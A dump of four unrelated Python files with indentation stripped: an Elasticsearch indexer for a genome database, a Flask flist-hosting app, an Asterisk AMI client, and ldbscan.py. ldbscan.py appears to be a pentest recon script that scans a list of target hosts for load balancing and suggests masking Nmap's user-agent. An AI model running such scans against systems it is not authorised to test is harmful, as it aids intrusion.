if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_complex_names():
complexes = DBSession.query(Complexdbentity).all()
print(("Indexing " + str(len(complexes)) + " complex names"))
bulk_data = []
for c in complexes:
synonyms = DBSession.query(ComplexAlias.display_name).filter_by(
complex_id=c.dbentity_id).all()
references = set([])
refs = DBSession.query(ComplexReference).filter_by(
complex_id=c.dbentity_id).all()
for ref in refs:
references.add(ref.reference.display_name)
complex_loci = set([])
annotations = DBSession.query(Complexbindingannotation).filter_by(
complex_id=c.dbentity_id).all()
for a in annotations:
interactor = a.interactor
if interactor.locus_id is not None:
complex_loci.add(interactor.locus.display_name)
key_values = [
c.intact_id, c.complex_accession, c.sgdid
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
obj = {
"name": c.display_name,
"complex_name": c.display_name,
"href": "/complex/" + c.complex_accession,
"description": c.description + "; " + c.properties,
"category": "complex",
"synonyms": [s[0] for s in synonyms],
"systematic_name": c.systematic_name,
"intact_id": c.intact_id,
"complex_accession": c.complex_accession,
"complex_loci": sorted(list(complex_loci)),
"references": list(references),
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_alleles():
so_id_to_term = dict([(x.so_id, x.display_name) for x in DBSession.query(So).all()])
alleles = DBSession.query(Alleledbentity).all()
print(("Indexing " + str(len(alleles)) + " allele names"))
bulk_data = []
for a in alleles:
allele_type = so_id_to_term.get(a.so_id)
synonyms = DBSession.query(AlleleAlias.display_name).filter_by(
allele_id=a.dbentity_id).all()
obj = {
"name": a.display_name,
"allele_name": a.display_name,
"href": "/allele/" + a.format_name,
"description": a.description,
"category": "Allele",
"synonyms": [s[0] for s in synonyms],
"allele_type": allele_type
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_chemicals():
all_chebi_data = DBSession.query(Chebi).all()
_result = IndexESHelper.get_chebi_annotations(all_chebi_data)
bulk_data = []
print(("Indexing " + str(len(all_chebi_data)) + " chemicals"))
for item_key, item_v in list(_result.items()):
if item_v is not None:
obj = {
"name": item_v.display_name,
"chemical_name": item_v.display_name,
"href": item_v.obj_url,
"description": item_v.description,
"category": "chemical",
"keys": [],
"chebiid": item_v.chebiid
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": "chemical_" + str(item_key)
}
})
bulk_data.append(obj)
if len(bulk_data) == 300:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_part_1():
index_phenotypes()
index_not_mapped_genes()
index_strains()
index_colleagues()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_downloads()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_genes()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_chemicals()
def index_part_2():
index_reserved_names()
index_toolbar_links()
index_observables()
index_disease_terms()
index_references()
index_alleles()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_go_terms()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_complex_names()
def index_toolbar_links():
tools = DBSession.query(Tools).all()
print(("Indexing " + str(len(tools)) + " toolbar links"))
for x in tools:
keys = []
if x.index_key:
keys = x.index_key
obj = {
"name": x.display_name,
"resource_name": x.display_name,
"href": x.link_url,
"description": None,
"category": "resource",
"keys": keys
}
es.index(index=INDEX_NAME, body=obj, id=x.link_url)
if __name__ == "__main__":
'''
To run multi-processing add this:
with concurrent.futures.ProcessPoolExecutor(max_workers=8) as executor:
index_references()
'''
# index_strains()
# index_genes()
cleanup()
setup()
t1 = Thread(target=index_part_1)
t2 = Thread(target=index_part_2)
t1.start()
t2.start()
|
ldbscan.py
|
#!/usr/bin/env python
import subprocess
import multiprocessing
from multiprocessing import Process, Queue
import os
import time
def lbd(domain):
domain = domain.strip()
print "INFO: Running general ldb scans for " + domain
# lbdSCAN = "lbd %s" % (domain)
# results = subprocess.check_output(lbdSCAN, shell=True)
# lines = results.split("\n")
lines = subprocess.check_output(['ldb',domain]).split("\n")
for line in lines:
line = line.strip()
if ("Load-balancing" in line) and not ("NOT" in line):
print (line)
if ("does NOT use Load-balancing" in line):
print (line)
else:
return
return
if __name__=='__main__':
f = open('results/exam/targets.txt', 'r') # CHANGE THIS!! grab the alive hosts from the discovery scan for enum
# Also check Nmap user-agent string, should be set to Firefox
for domain in f:
jobs = []
p = multiprocessing.Process(target=lbd, args=(domain,))
jobs.append(p)
p.start()
f.close()
|
flist-uploader.py
|
import os
import sys
import shutil
import json
import threading
import time
import hub.itsyouonline
import hub.threebot
import hub.security
from stat import *
from flask import Flask, Response, request, redirect, url_for, render_template, abort, make_response, send_from_directory, session
from werkzeug.utils import secure_filename
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.wrappers import Request
from config import config
from hub.flist import HubPublicFlist, HubFlist
from hub.docker import HubDocker
from hub.notifier import EventNotifier
#
# runtime configuration
# theses location should works out-of-box if you use default settings
#
if not 'userdata-root-path' in config:
config['userdata-root-path'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../public")
if not 'workdir-root-path' in config:
config['workdir-root-path'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../workdir")
if not 'public-directory' in config:
config['public-directory'] = os.path.join(config['userdata-root-path'], "users")
if not 'flist-work-directory' in config:
config['flist-work-directory'] = os.path.join(config['workdir-root-path'], "temp")
if not 'docker-work-directory' in config:
config['docker-work-directory'] = os.path.join(config['workdir-root-path'], "temp")
if not 'upload-directory' in config:
config['upload-directory'] = os.path.join(config['workdir-root-path'], "distfiles")
if not 'allowed-extensions' in config:
config['allowed-extensions'] = set(['.tar.gz'])
if not 'authentication' in config:
config['authentication'] = True
print("[+] user directory : %s" % config['userdata-root-path'])
print("[+] works directory : %s" % config['workdir-root-path'])
print("[+] upload directory: %s" % config['upload-directory'])
print("[+] flist creation : %s" % config['flist-work-directory'])
print("[+] docker creation : %s" % config['docker-work-directory'])
print("[+] public directory: %s" % config['public-directory'])
#
# pre-check settings
# checking configuration settings needed for runtime
#
hc = HubFlist(config)
if not hc.check():
print("[-] pre-check: your local configuration seems not correct")
print("[-] pre-check: please check config.py settings and backend status")
sys.exit(1)
#
# initialize flask application
#
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
app.url_map.strict_slashes = False
app.secret_key = os.urandom(24)
# notifications
announcer = EventNotifier()
if config['authentication']:
hub.itsyouonline.configure(app,
config['iyo-clientid'], config['iyo-secret'], config['iyo-callback'],
'/_iyo_callback', None, True, True, 'organization', config['guest-token']
)
hub.threebot.configure(app, config['threebot-appid'], config['threebot-privatekey'], config['threebot-seed'])
else:
hub.itsyouonline.disabled(app)
config['official-repositories'] = ['Administrator']
print("[-] -- WARNING -------------------------------------")
print("[-] ")
print("[-] AUTHENTICATION DISABLED ")
print("[-] FULL CONTROL IS ALLOWED FOR ANYBODY ")
print("[-] ")
print("[-] This mode should be _exclusively_ used in local ")
print("[-] development or private environment, never in ")
print("[-] public production environment, except if you ")
print("[-] know what you're doing ")
print("[-] ")
print("[-] -- WARNING -------------------------------------")
######################################
#
# TEMPLATES MANIPULATION
#
######################################
def allowed_file(filename, validate=False):
if validate:
return filename.endswith(".flist")
for ext in config['allowed-extensions']:
if filename.endswith(ext):
return True
return False
def globalTemplate(filename, args):
args['debug'] = config['debug']
if 'username' in session:
args['username'] = session['username']
if 'accounts' in session:
args['accounts'] = session['accounts']
return render_template(filename, **args)
def file_from_flist(filename):
cleanfilename = filename
for ext in config['allowed-extensions']:
if cleanfilename.endswith(ext):
cleanfilename = cleanfilename[:-len(ext)]
return cleanfilename
def uploadSuccess(flistname, filescount, home, username=None):
if username is None:
username = session['username']
settings = {
'username': username,
'accounts': session['accounts'],
'flistname': flistname,
'filescount': 0,
'flisturl': "%s/%s/%s" % (config['public-website'], username, flistname),
'ardbhost': 'zdb://%s:%d' % (config['backend-public-host'], config['backend-public-port']),
}
return globalTemplate("success.html", settings)
def internalRedirect(target, error=None, extra={}):
settings = {
'username': None,
'accounts': [],
}
settings.update(extra)
if error:
settings['error'] = error
return globalTemplate(target, settings)
def flist_merge_post():
sources = request.form.getlist('flists[]')
target = request.form['name']
return flist_merge_data(sources, target)
def flist_merge_data(sources, target):
data = {}
data['error'] = None
data['sources'] = sources
data['target'] = target
if not isinstance(sources, list):
data['error'] = 'malformed json request'
return data
if len(data['sources']) == 0:
data['error'] = "no source found"
return data
# ensure .flist extension to each sources
fsources = []
for source in data['sources']:
# missing username/filename
if "/" not in source:
data['error'] = "malformed source filename"
return data
cleaned = source if source.endswith(".flist") else source + ".flist"
fsources.append(cleaned)
data['sources'] = fsources
# ensure each sources exists
for source in data['sources']:
temp = source.split("/")
item = HubPublicFlist(config, temp[0], temp[1])
if not item.file_exists:
data['error'] = "%s does not exists" % source
return data
if not data['target']:
data['error'] = "missing build (target) name"
return data
if "/" in data['target']:
data['error'] = "build name not allowed"
return data
if not data['target'].endswith('.flist'):
data['target'] += '.flist'
return data
######################################
#
# ROUTING ACTIONS
#
######################################
@app.route('/logout')
def logout():
hub.security.invalidate()
return internalRedirect("users.html")
@app.route('/login-method')
def login_method():
return internalRedirect("logins.html")
@app.route('/login-iyo')
@hub.itsyouonline.force_login()
def login_iyo():
return internalRedirect("users.html")
@app.route('/token/<token>')
def show_token(token):
return globalTemplate("token.html", {'token': token, "url": config['public-website']})
@app.route('/upload', methods=['GET', 'POST'])
@hub.security.protected()
def upload_file():
username = session['username']
if request.method == 'POST':
response = api_flist_upload_prepare(request, username)
return response
"""
if response['status'] == 'success':
return uploadSuccess(response['flist'], response['stats'], response['home'])
if response['status'] == 'error':
return internalRedirect("upload.html", response['message'])
"""
return internalRedirect("upload.html")
@app.route('/upload-flist', methods=['GET', 'POST'])
@hub.security.protected()
def upload_file_flist():
username = session['username']
if request.method == 'POST':
response = api_flist_upload(request, username, validate=True)
if response['status'] == 'success':
return uploadSuccess(response['flist'], response['stats'], response['home'])
if response['status'] == 'error':
return internalRedirect("upload-flist.html", response['message'])
return internalRedirect("upload-flist.html")
@app.route('/merge', methods=['GET', 'POST'])
@hub.security.protected()
def flist_merge():
username = session['username']
if request.method == 'POST':
data = flist_merge_post()
print(data)
if data['error']:
return internalRedirect("merge.html", data['error'])
flist = HubPublicFlist(config, username, data['target'])
status = flist.merge(data['sources'])
if not status == True:
variables = {'error': status}
return globalTemplate("merge.html", variables)
return uploadSuccess(data['target'], 0, data['target'])
# Merge page
return internalRedirect("merge.html")
@app.route('/docker-convert', methods=['GET', 'POST'])
@hub.security.protected()
def docker_handler():
username = session['username']
if request.method == 'POST':
if not request.form.get("docker-input"):
return internalRedirect("docker.html", "missing docker image name")
docker = HubDocker(config, announcer)
print("[+] docker converter id: %s" % docker.jobid)
job = threading.Thread(target=docker.convert, args=(request.form.get("docker-input"), username, ))
job.start()
return internalRedirect("docker-progress.html", None, {'jobid': docker.jobid})
# Docker page
return internalRedirect("docker.html")
######################################
#
# ROUTING NAVIGATION
#
######################################
@app.route('/')
def show_users():
return globalTemplate("users.html", {})
@app.route('/<username>')
def show_user(username):
flist = HubPublicFlist(config, username, "unknown")
if not flist.user_exists:
abort(404)
return globalTemplate("user.html", {'targetuser': username})
@app.route('/<username>/<flist>.md')
def show_flist_md(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.file_exists:
abort(404)
variables = {
'targetuser': username,
'flistname': flist.filename,
'flisturl': "%s/%s/%s" % (config['public-website'], username, flist.filename),
'ardbhost': 'zdb://%s:%d' % (config['backend-public-host'], config['backend-public-port']),
'checksum': flist.checksum
}
return globalTemplate("preview.html", variables)
@app.route('/<username>/<flist>.txt')
def show_flist_txt(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.file_exists:
abort(404)
text = "File: %s\n" % flist.filename
text += "Uploader: %s\n" % username
text += "Source: %s/%s/%s\n" % (config['public-website'], username, flist.filename)
text += "Storage: zdb://%s:%d\n" % (config['backend-public-host'], config['backend-public-port'])
text += "Checksum: %s\n" % flist.checksum
response = make_response(text)
response.headers["Content-Type"] = "text/plain"
return response
@app.route('/<username>/<flist>.json')
def show_flist_json(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.file_exists:
abort(404)
data = {
'flist': flist,
'uploader': username,
'source': "%s/%s/%s" % (config['public-website'], username, flist),
'storage': "zdb://%s:%d" % (config['backend-public-host'], config['backend-public-port']),
'checksum': flist.checksum
}
response = make_response(json.dumps(data) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/<username>/<flist>.flist')
def download_flist(username, flist):
flist = HubPublicFlist(config, username, flist)
return send_from_directory(directory=flist.user_path, filename=flist.filename)
@app.route('/<username>/<flist>.flist.md5')
def checksum_flist(username, flist):
flist = HubPublicFlist(config, username, flist)
hash = flist.checksum
if not hash:
abort(404)
response = make_response(hash + "\n")
response.headers["Content-Type"] = "text/plain"
return response
@app.route('/search')
def search_flist():
return globalTemplate("search.html", {})
######################################
#
# ROUTING API
#
######################################
#
# Public API
#
@app.route('/api/flist')
def api_list():
repositories = api_repositories()
output = []
for user in repositories:
target = os.path.join(config['public-directory'], user['name'])
# ignore files (eg: .keep file)
if not os.path.isdir(target):
continue
flists = sorted(os.listdir(target))
for flist in flists:
output.append("%s/%s" % (user['name'], flist))
response = make_response(json.dumps(output) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/fileslist')
def api_list_files():
fileslist = api_fileslist()
response = make_response(json.dumps(fileslist) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/repositories')
def api_list_repositories():
repositories = api_repositories()
response = make_response(json.dumps(repositories) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>')
def api_user_contents(username):
flist = HubPublicFlist(config, username, "unknown")
if not flist.user_exists:
abort(404)
contents = api_user_contents(username, flist.user_path)
response = make_response(json.dumps(contents) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>/<flist>', methods=['GET', 'INFO'])
def api_inspect(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
if request.method == 'GET':
contents = api_contents(flist)
if request.method == 'INFO':
contents = api_flist_info(flist)
response = make_response(json.dumps(contents) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>/<flist>/light', methods=['GET'])
def api_inspect_light(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
contents = api_flist_info(flist)
response = make_response(json.dumps(contents) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>/<flist>/metadata')
def api_readme(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
readme = api_flist_md(flist)
response = make_response(json.dumps(readme) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/me', methods=['GET'])
@hub.security.apicall()
def api_my_myself():
username = session['username']
return api_response(extra={"username": username})
@app.route('/api/flist/me/<flist>', methods=['GET', 'DELETE'])
@hub.security.apicall()
def api_my_inspect(flist):
username = session['username']
if request.method == 'DELETE':
return api_delete(username, flist)
return api_inspect(username, flist)
@app.route('/api/flist/me/<source>/link/<linkname>', methods=['GET'])
@hub.security.apicall()
def api_my_symlink(source, linkname):
username = session['username']
return api_symlink(username, source, linkname)
@app.route('/api/flist/me/<linkname>/crosslink/<repository>/<sourcename>', methods=['GET'])
@hub.security.apicall()
def api_my_crosssymlink(linkname, repository, sourcename):
username = session['username']
return api_cross_symlink(username, repository, sourcename, linkname)
@app.route('/api/flist/me/<source>/rename/<destination>')
@hub.security.apicall()
def api_my_rename(source, destination):
username = session['username']
flist = HubPublicFlist(config, username, source)
destflist = HubPublicFlist(config, username, destination)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
os.rename(flist.target, destflist.target)
return api_response()
@app.route('/api/flist/me/promote/<sourcerepo>/<sourcefile>/<localname>', methods=['GET'])
@hub.security.apicall()
def api_my_promote(sourcerepo, sourcefile, localname):
username = session['username']
return api_promote(username, sourcerepo, sourcefile, localname)
@app.route('/api/flist/me/upload', methods=['POST'])
@hub.security.apicall()
def api_my_upload():
username = session['username']
response = api_flist_upload(request, username)
if response['status'] == 'success':
if config['debug']:
return api_response(extra={'name': response['flist'], 'files': response['stats'], 'timing': {}})
else:
return api_response(extra={'name': response['flist'], 'files': response['stats']})
if response['status'] == 'error':
return api_response(response['message'], 500)
@app.route('/api/flist/me/upload-flist', methods=['POST'])
@hub.security.apicall()
def api_my_upload_flist():
username = session['username']
response = api_flist_upload(request, username, validate=True)
if response['status'] == 'success':
if config['debug']:
return api_response(extra={'name': response['flist'], 'files': response['stats'], 'timing': {}})
else:
return api_response(extra={'name': response['flist'], 'files': response['stats']})
if response['status'] == 'error':
return api_response(response['message'], 500)
@app.route('/api/flist/me/merge/<target>', methods=['POST'])
@hub.security.apicall()
def api_my_merge(target):
username = session['username']
sources = request.get_json(silent=True, force=True)
data = flist_merge_data(sources, target)
if data['error'] != None:
return api_response(data['error'], 500)
flist = HubPublicFlist(config, username, data['target'])
status = flist.merge(data['sources'])
if not status == True:
return api_response(status, 500)
return api_response()
@app.route('/api/flist/me/docker', methods=['POST'])
@hub.security.apicall()
def api_my_docker():
username = session['username']
if not request.form.get("image"):
return api_response("missing docker image name", 400)
docker = HubDocker(config, announcer)
response = docker.convert(request.form.get("image"), username)
if response['status'] == 'success':
return api_response(extra={'name': response['flist']})
if response['status'] == 'error':
return api_response(response['message'], 500)
return api_response("unexpected docker convert error", 500)
######################################
#
# API IMPLEMENTATION
#
######################################
def api_delete(username, source):
flist = HubPublicFlist(config, username, source)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
os.unlink(flist.target)
return api_response()
def api_symlink(username, source, linkname):
flist = HubPublicFlist(config, username, source)
linkflist = HubPublicFlist(config, username, linkname)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
# remove previous symlink if existing
if os.path.islink(linkflist.target):
os.unlink(linkflist.target)
# if it was not a link but a regular file, we don't overwrite
# existing flist, we only allows updating links
if os.path.isfile(linkflist.target):
return api_response("link destination is already a file", 401)
cwd = os.getcwd()
os.chdir(flist.user_path)
os.symlink(flist.filename, linkflist.filename)
os.chdir(cwd)
return api_response()
def api_cross_symlink(username, repository, sourcename, linkname):
flist = HubPublicFlist(config, repository, sourcename)
linkflist = HubPublicFlist(config, username, linkname)
if not flist.user_exists:
return api_response("source repository not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
# remove previous symlink if existing
if os.path.islink(linkflist.target):
os.unlink(linkflist.target)
# if it was not a link but a regular file, we don't overwrite
# existing flist, we only allows updating links
if os.path.isfile(linkflist.target):
return api_response("link destination is already a file", 401)
cwd = os.getcwd()
os.chdir(linkflist.user_path)
os.symlink("../" + flist.username + "/" + flist.filename, linkflist.filename)
os.chdir(cwd)
return api_response()
def api_promote(username, sourcerepo, sourcefile, targetname):
flist = HubPublicFlist(config, sourcerepo, sourcefile)
destination = HubPublicFlist(config, username, targetname)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
# ensure target exists
if not destination.user_exists:
destination.user_create()
# remove previous file if existing
if os.path.exists(destination.target):
os.unlink(destination.target)
print("[+] promote: %s -> %s" % (flist.target, destination.target))
shutil.copy(flist.target, destination.target)
status = {
'source': {
'username': flist.username,
'filename': flist.filename,
},
'destination': {
'username': destination.username,
'filename': destination.filename,
}
}
return api_response(extra=status)
def api_flist_upload(request, username, validate=False):
# check if the post request has the file part
if 'file' not in request.files:
return {'status': 'error', 'message': 'no file found'}
file = request.files['file']
# if user does not select file, browser also
# submit a empty part without filename
if file.filename == '':
return {'status': 'error', 'message': 'no file selected'}
if not allowed_file(file.filename, validate):
return {'status': 'error', 'message': 'this file is not allowed'}
#
# processing the file
#
filename = secure_filename(file.filename)
print("[+] saving file")
source = os.path.join(config['upload-directory'], filename)
file.save(source)
cleanfilename = file_from_flist(filename)
flist = HubPublicFlist(config, username, cleanfilename)
flist.user_create()
# it's a new flist, let's do the normal flow
if not validate:
workspace = flist.raw.workspace()
flist.raw.unpack(source, workspace.name)
stats = flist.raw.create(workspace.name, flist.target)
# we have an existing flist and checking contents
# we don't need to create the flist, we just ensure the
# contents is on the backend
else:
flist.loads(source)
stats = flist.validate()
if stats['response']['failure'] > 0:
return {'status': 'error', 'message': 'unauthorized upload, contents is not fully present on backend'}
flist.commit()
# removing uploaded source file
os.unlink(source)
return {'status': 'success', 'flist': flist.filename, 'home': username, 'stats': stats, 'timing': {}}
def api_flist_upload_prepare(request, username, validate=False):
# check if the post request has the file part
if 'file' not in request.files:
return {'status': 'error', 'message': 'no file found'}
file = request.files['file']
# if user does not select file, browser also
# submit a empty part without filename
if file.filename == '':
return {'status': 'error', 'message': 'no file selected'}
if not allowed_file(file.filename, validate):
return {'status': 'error', 'message': 'this file is not allowed'}
#
# processing the file
#
filename = secure_filename(file.filename)
print("[+] saving file")
source = os.path.join(config['upload-directory'], filename)
file.save(source)
cleanfilename = file_from_flist(filename)
flist = HubPublicFlist(config, username, cleanfilename, announcer)
flist.raw.newtask()
print("[+] flist creation id: %s" % flist.raw.jobid)
job = threading.Thread(target=flist.create, args=(source, ))
job.start()
return {'status': 'success', 'jobid': flist.raw.jobid}
"""
print(flist.raw.jobid)
flist.user_create()
# it's a new flist, let's do the normal flow
if not validate:
workspace = flist.raw.workspace()
flist.raw.unpack(source, workspace.name)
stats = flist.raw.create(workspace.name, flist.target)
# we have an existing flist and checking contents
# we don't need to create the flist, we just ensure the
# contents is on the backend
else:
flist.loads(source)
stats = flist.validate()
if stats['response']['failure'] > 0:
return {'status': 'error', 'message': 'unauthorized upload, contents is not fully present on backend'}
flist.commit()
# removing uploaded source file
os.unlink(source)
return {'status': 'success', 'flist': flist.filename, 'home': username, 'stats': stats, 'timing': {}}
"""
def api_repositories():
output = []
try:
root = sorted(os.listdir(config['public-directory']))
except FileNotFoundError as e:
print(e)
root = []
for user in root:
target = os.path.join(config['public-directory'], user)
# ignore files (eg: .keep file)
if not os.path.isdir(target):
continue
official = (user in config['official-repositories'])
output.append({'name': user, 'official': official})
return output
def clean_symlink(linkname):
return linkname.replace("../", "")
def api_user_contents(username, userpath):
files = sorted(os.listdir(userpath))
contents = []
for file in files:
filepath = os.path.join(config['public-directory'], username, file)
stat = os.lstat(filepath)
if S_ISLNK(stat.st_mode):
target = os.readlink(filepath)
tstat = stat
if os.path.exists(filepath):
tstat = os.stat(filepath)
contents.append({
'name': file,
'size': "%.2f KB" % ((tstat.st_size) / 1024),
'updated': int(tstat.st_mtime),
'linktime': int(stat.st_mtime),
'type': 'symlink',
'target': clean_symlink(target),
})
else:
contents.append({
'name': file,
'size': "%.2f KB" % ((stat.st_size) / 1024),
'updated': int(stat.st_mtime),
'type': 'regular',
})
return contents
def api_fileslist():
repositories = api_repositories()
fileslist = {}
for repository in repositories:
flist = HubPublicFlist(config, repository['name'], "unknown")
contents = api_user_contents(flist.username, flist.user_path)
fileslist[repository['name']] = contents
return fileslist
def api_contents(flist):
flist.loads(flist.target)
contents = flist.contents()
return contents["response"]
def api_flist_md(flist):
flist.loads(flist.target)
response = flist.allmetadata()
return response
def api_flist_info(flist):
stat = os.lstat(flist.target)
file = os.path.basename(flist.target)
contents = {
'name': file,
'size': stat.st_size,
'updated': int(stat.st_mtime),
'type': 'regular',
'md5': flist.checksum,
}
if S_ISLNK(stat.st_mode):
target = os.readlink(flist.target)
tstat = stat
if os.path.exists(flist.target):
tstat = os.stat(flist.target)
contents['type'] = 'symlink'
contents['updated'] = int(tstat.st_mtime)
contents['linktime'] = int(stat.st_mtime)
contents['target'] = target
contents['size'] = tstat.st_size
return contents
def api_response(error=None, code=200, extra=None):
reply = {"status": "success"}
if error:
reply = {"status": "error", "message": error}
if extra:
reply['payload'] = extra
response = make_response(json.dumps(reply) + "\n", code)
response.headers["Content-Type"] = "application/json"
return response
#
# notification subsystem (server-sent event)
#
@app.route('/listen/<id>', methods=['GET'])
def listen(id):
print("[+] listening id: %s" % id)
def stream():
messages = announcer.listen(id)
while True:
msg = messages.get()
# reaching None means there is nothing more expected
# on this job, we can clean it up
if msg == None:
announcer.terminate(id)
return
yield msg
messages = announcer.listen(id)
if messages == None:
return announcer.error("job id not found"), 404
return Response(stream(), mimetype='text/event-stream')
######################################
#
# PROCESSING
#
######################################
print("[+] listening")
app.run(host="0.0.0.0", port=5555, debug=config['debug'], threaded=True)
|
client.py
|
import re
import socket
import threading
from functools import partial
from .action import Action, LoginAction, LogoffAction, SimpleAction
from .event import Event, EventListener
from .response import Response, FutureResponse
import logging
import sys, traceback
_logger = logging.getLogger(__name__)
try:
unicode = unicode
except NameError:
str = str
unicode = str
bytes = bytes
basestring = (str, bytes)
else:
str = str
unicode = unicode
bytes = str
basestring = basestring
NOOP = lambda *args, **kwargs: None
NOOP_LISTENER = dict(
on_action=NOOP,
on_response=NOOP,
on_event=NOOP,
on_connect=NOOP,
on_disconnect=NOOP,
on_unknown=NOOP,
)
class AMIClientListener(object):
methods = ['on_action', 'on_response', 'on_event', 'on_connect', 'on_disconnect', 'on_unknown']
def __init__(self, **kwargs):
for k, v in kwargs.items():
if k not in self.methods:
raise TypeError('\'%s\' is an invalid keyword argument for this function' % k)
setattr(self, k, v)
def on_action(self, source, action):
raise NotImplementedError()
def on_response(self, source, response):
raise NotImplementedError()
def on_event(self, source, event):
raise NotImplementedError()
def on_connect(self, source):
raise NotImplementedError()
def on_disconnect(self, source, error=None):
raise NotImplementedError()
def on_unknown(self, source, pack):
raise NotImplementedError()
class AMIClient(object):
asterisk_start_regex = re.compile('^Asterisk *Call *Manager/(?P<version>([0-9]+\.)*[0-9]+)', re.IGNORECASE)
asterisk_line_regex = re.compile(b'\r\n', re.IGNORECASE | re.MULTILINE)
asterisk_pack_regex = re.compile(b'\r\n\r\n', re.IGNORECASE | re.MULTILINE)
def __init__(self, address='127.0.0.1', port=5038,
encoding='utf-8', timeout=3, buffer_size=2 ** 10,
**kwargs):
self._action_counter = 0
self._futures = {}
self._listeners = []
self._event_listeners = []
self._address = address
self._buffer_size = buffer_size
self._port = port
self._socket = None
self._thread = None
self.finished = None
self._ami_version = None
self._timeout = timeout
self.encoding = encoding
if len(kwargs) > 0:
self.add_listener(**kwargs)
def next_action_id(self):
id = self._action_counter
self._action_counter += 1
return str(id)
def connect(self):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.settimeout(5)
self._socket.connect((self._address, self._port))
self.finished = threading.Event()
self._thread = threading.Thread(target=self.listen)
self._thread.daemon = True
self._thread.start()
def _fire_on_connect(self, **kwargs):
for listener in self._listeners:
listener.on_connect(source=self, **kwargs)
def _fire_on_disconnect(self, **kwargs):
for listener in self._listeners:
listener.on_disconnect(source=self, **kwargs)
def _fire_on_response(self, **kwargs):
for listener in self._listeners:
listener.on_response(source=self, **kwargs)
def _fire_on_action(self, **kwargs):
for listener in self._listeners:
listener.on_action(source=self, **kwargs)
def _fire_on_event(self, **kwargs):
for listener in self._listeners:
listener.on_event(source=self, **kwargs)
def _fire_on_unknown(self, **kwargs):
for listener in self._listeners:
listener.on_unknown(source=self, **kwargs)
def disconnect(self):
self.finished.set()
try:
self._socket.close()
self._thread.join()
except:
pass
def login(self, username, secret, callback=None):
if self.finished is None or self.finished.is_set():
self.connect()
return self.send_action(LoginAction(username, secret), callback)
def logoff(self, callback=None):
if self.finished is None or self.finished.is_set():
return
return self.send_action(LogoffAction(), callback)
def send_action(self, action, callback=None):
if 'ActionID' not in action.keys:
action_id = self.next_action_id()
action.keys['ActionID'] = action_id
else:
action_id = action.keys['ActionID']
future = FutureResponse(callback, self._timeout)
self._futures[action_id] = future
self._fire_on_action(action=action)
self.send(action)
return future
def send(self, pack):
self._socket.send(bytearray(unicode(pack) + '\r\n', self.encoding))
def _decode_pack(self, pack):
return pack.decode(self.encoding)
def _next_pack(self):
data = b''
while not self.finished.is_set():
recv = self._socket.recv(self._buffer_size)
if recv == b'':
_logger.info("Did receive empty string in first iter!")
self.finished.set()
continue
data += recv
if self.asterisk_line_regex.search(data):
(pack, data) = self.asterisk_line_regex.split(data, 1)
yield self._decode_pack(pack)
break
while not self.finished.is_set():
while self.asterisk_pack_regex.search(data):
(pack, data) = self.asterisk_pack_regex.split(data, 1)
yield self._decode_pack(pack)
recv = self._socket.recv(self._buffer_size)
if recv == b'':
_logger.info("Did receive empty string in second iter!")
self.finished.set()
continue
data += recv
self._socket.close()
def listen(self):
try:
pack_generator = self._next_pack()
asterisk_start = next(pack_generator)
match = AMIClient.asterisk_start_regex.match(asterisk_start)
if not match:
raise Exception("Asterisk Start Exception")
self._ami_version = match.group('version')
self._fire_on_connect()
except Exception, e:
_logger.error("Exception on first packet: %s", e)
